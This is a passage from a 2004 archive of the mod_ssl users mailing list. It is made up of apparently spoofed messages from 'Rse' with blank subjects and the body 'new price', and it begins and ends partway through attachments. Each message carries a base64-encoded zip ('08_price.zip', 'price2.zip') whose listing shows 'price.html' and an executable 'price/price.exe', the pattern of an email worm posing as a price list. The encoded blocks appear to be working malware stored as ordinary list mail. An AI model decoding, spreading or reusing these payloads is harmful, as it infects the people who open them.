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

----------rxwblqlnyolvdxcfqmvp--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 10 00:02:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F08A4A8D0B; Tue, 10 Aug 2004 00:02:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maldito.net (cm-net-poa-C8B025E0.brdterra.com.br [200.176.37.224])
	by master.modssl.org (Postfix) with SMTP id 332BAA8D04
	for ; Tue, 10 Aug 2004 00:01:57 +0200 (CEST)
Date: Mon, 09 Aug 2004 19:10:33 -0300
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------kizmaspqlvaavldeupsb"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------kizmaspqlvaavldeupsb
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------kizmaspqlvaavldeupsb
Content-Type: application/octet-stream; name="08_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="08_price.zip"

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

----------kizmaspqlvaavldeupsb--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 10 00:32:06 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 43BA2A8945; Tue, 10 Aug 2004 00:32:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from CVGKYORK.net (slip-32-101-235-126.pa.us.prserv.net [32.101.235.126])
	by master.modssl.org (Postfix) with SMTP id 55E43A893A
	for ; Tue, 10 Aug 2004 00:31:54 +0200 (CEST)
Date: Mon, 09 Aug 2004 17:30:23 -0600
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ntbpejvubpcbvoxmyetf"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ntbpejvubpcbvoxmyetf
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new  price







----------ntbpejvubpcbvoxmyetf
Content-Type: application/octet-stream; name="price2.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price2.zip"

UEsDBBQAAAAIANSBCTE3Aq1SCQIAAD4EAAAKAAAAcHJpY2UuaHRtbI1U34+aQBB+v+T+hzke
